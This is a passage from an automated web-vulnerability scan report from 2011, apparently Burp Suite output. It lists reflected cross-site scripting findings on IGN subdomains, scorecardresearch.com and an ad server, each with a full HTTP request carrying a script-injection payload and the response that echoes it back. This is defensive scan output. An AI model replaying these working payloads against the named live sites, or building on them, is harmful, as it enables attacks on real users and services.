GET /st?ad_type=iframe&ad_size=1x1&section=1678185&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel&85eca"-alert(1)-"6337c1d9bd9=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/177/ignus/300x250/ign_front?t=1297040536334&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fcheats.ign.com%2F%3F7cd43%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ebc6f5a7fbe9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F4
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:04:26 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 07 Feb 2011 01:04:26 GMT
Pragma: no-cache
Content-Length: 5050
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?85eca"-alert(1)-"6337c1d9bd9=1&Z=1x1&admeld_callback=http%3a%2f%2ftag.admeld.com%2fpixel&admeld_dataprovider_id=11&admeld_user_id=6acccca4%2dd0e4%2d464e%2da824%2df67cb28d5556&s=1678185&_salt=4252970181";var RM_POP_COOKIE_NAME='ym
...[SNIP]...

1.52. http://au.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://au.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66893"-alert(1)-"f7383b9f650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?66893"-alert(1)-"f7383b9f650=1 HTTP/1.1
Host: au.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:11:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:11:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-13836-971151739-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:11:23 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041083649v-1n-12mc+1297041083649mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 184138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Video Games, Cheat
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://au.ign.com/?66893"-alert(1)-"f7383b9f650=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.53. http://au.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://au.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c49dc"><script>alert(1)</script>ff0d8373217 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c49dc"><script>alert(1)</script>ff0d8373217=1 HTTP/1.1
Host: au.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:11:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:11:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-27586-1049822303-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:11:07 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041067781v-1n-12mc+1297041067781mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 184215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Video Games, Cheat
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://au.ign.com/?c49dc"><script>alert(1)</script>ff0d8373217=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.54. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 9ae6f<script>alert(1)</script>fb23142505d was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=39ae6f<script>alert(1)</script>fb23142505d&c2=6035537&c3=4732978&c4=40554329&c5=56586626&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 00:56:26 GMT
Date: Mon, 07 Feb 2011 00:56:26 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"39ae6f<script>alert(1)</script>fb23142505d", c2:"6035537", c3:"4732978", c4:"40554329", c5:"56586626", c6:"", c10:"", c15:"", c16:"", r:""});

1.55. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload bc307<script>alert(1)</script>c7e2144cf48 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=18&c4=13378&c5=&c6=&c10=3189128bc307<script>alert(1)</script>c7e2144cf48&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=22002200&pos=leaderboard&rnd=316990301
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 02:17:50 GMT
Date: Mon, 07 Feb 2011 02:17:50 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"18", c4:"13378", c5:"", c6:"", c10:"3189128bc307<script>alert(1)</script>c7e2144cf48", c15:"", c16:"", r:""});

1.56. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload f4867<script>alert(1)</script>f5db88b0abc was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=18&c4=13378&c5=&c6=&c10=3189128&c15=f4867<script>alert(1)</script>f5db88b0abc HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=22002200&pos=leaderboard&rnd=316990301
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 02:17:50 GMT
Date: Mon, 07 Feb 2011 02:17:50 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"18", c4:"13378", c5:"", c6:"", c10:"3189128", c15:"f4867<script>alert(1)</script>f5db88b0abc", c16:"", r:""});

1.57. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload c2ee2<script>alert(1)</script>bd3b80d854e was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035537c2ee2<script>alert(1)</script>bd3b80d854e&c3=4732978&c4=40554329&c5=56586626&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 00:56:26 GMT
Date: Mon, 07 Feb 2011 00:56:26 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035537c2ee2<script>alert(1)</script>bd3b80d854e", c3:"4732978", c4:"40554329", c5:"56586626", c6:"", c10:"", c15:"", c16:"", r:""});

1.58. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 9dc11<script>alert(1)</script>92bb80ca587 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035537&c3=47329789dc11<script>alert(1)</script>92bb80ca587&c4=40554329&c5=56586626&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 00:56:26 GMT
Date: Mon, 07 Feb 2011 00:56:26 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035537", c3:"47329789dc11<script>alert(1)</script>92bb80ca587", c4:"40554329", c5:"56586626", c6:"", c10:"", c15:"", c16:"", r:""});

1.59. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 3c4c3<script>alert(1)</script>6d16a689337 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035537&c3=4732978&c4=405543293c4c3<script>alert(1)</script>6d16a689337&c5=56586626&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 00:56:26 GMT
Date: Mon, 07 Feb 2011 00:56:26 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035537", c3:"4732978", c4:"405543293c4c3<script>alert(1)</script>6d16a689337", c5:"56586626", c6:"", c10:"", c15:"", c16:"", r:""});

1.60. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload ae4e2<script>alert(1)</script>f3f65b08d45 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035537&c3=4732978&c4=40554329&c5=56586626ae4e2<script>alert(1)</script>f3f65b08d45&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 00:56:27 GMT
Date: Mon, 07 Feb 2011 00:56:27 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
or(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035537", c3:"4732978", c4:"40554329", c5:"56586626ae4e2<script>alert(1)</script>f3f65b08d45", c6:"", c10:"", c15:"", c16:"", r:""});

1.61. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 518e0<script>alert(1)</script>654ad6dd3fa was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035537&c3=4732978&c4=40554329&c5=56586626&c6=518e0<script>alert(1)</script>654ad6dd3fa HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 00:56:27 GMT
Date: Mon, 07 Feb 2011 00:56:27 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035537", c3:"4732978", c4:"40554329", c5:"56586626", c6:"518e0<script>alert(1)</script>654ad6dd3fa", c10:"", c15:"", c16:"", r:""});

1.62. http://bluray.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bluray.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21b33"><script>alert(1)</script>a678f7db862 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?21b33"><script>alert(1)</script>a678f7db862=1 HTTP/1.1
Host: bluray.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:11:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:11:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-24030-1808292441-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:11:43 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041103254v-1n-12mc+1297041103254mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 143858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Blu-ray Movies
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://bluray.ign.com/?21b33"><script>alert(1)</script>a678f7db862=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.63. http://bluray.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bluray.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 495f9"-alert(1)-"4ec9ce9d1ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?495f9"-alert(1)-"4ec9ce9d1ca=1 HTTP/1.1
Host: bluray.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:11:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:11:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-26779-1542844299-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:11:45 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041105410v-1n-12mc+1297041105410mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 143624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Blu-ray Movies
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://bluray.ign.com/?495f9"-alert(1)-"4ec9ce9d1ca=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.64. http://bluray.ign.com/index/release.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bluray.ign.com
Path:   /index/release.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14dc3"-alert(1)-"2d159836ba5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/release.html?14dc3"-alert(1)-"2d159836ba5=1 HTTP/1.1
Host: bluray.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:11:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:11:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c08-31833-708344065-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:11:37 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041097167v-1n-12mc+1297041097167mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Set-Cookie: JSESSIONID=392i6mtw1xkxs;Path=/indx
Set-Cookie: JSESSIONID=sa1lw7gadr04;Path=/indx
Content-Length: 140527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Blu-ray Movies
...[SNIP]...
of _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://bluray.ign.com/index/release.html?14dc3"-alert(1)-"2d159836ba5=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.65. http://bluray.ign.com/index/release.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bluray.ign.com
Path:   /index/release.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b279d"><script>alert(1)</script>bce7cd5b7fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/release.html?b279d"><script>alert(1)</script>bce7cd5b7fe=1 HTTP/1.1
Host: bluray.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:11:27 GMT
Cache-Control: max-age=0, no-cache, no-store
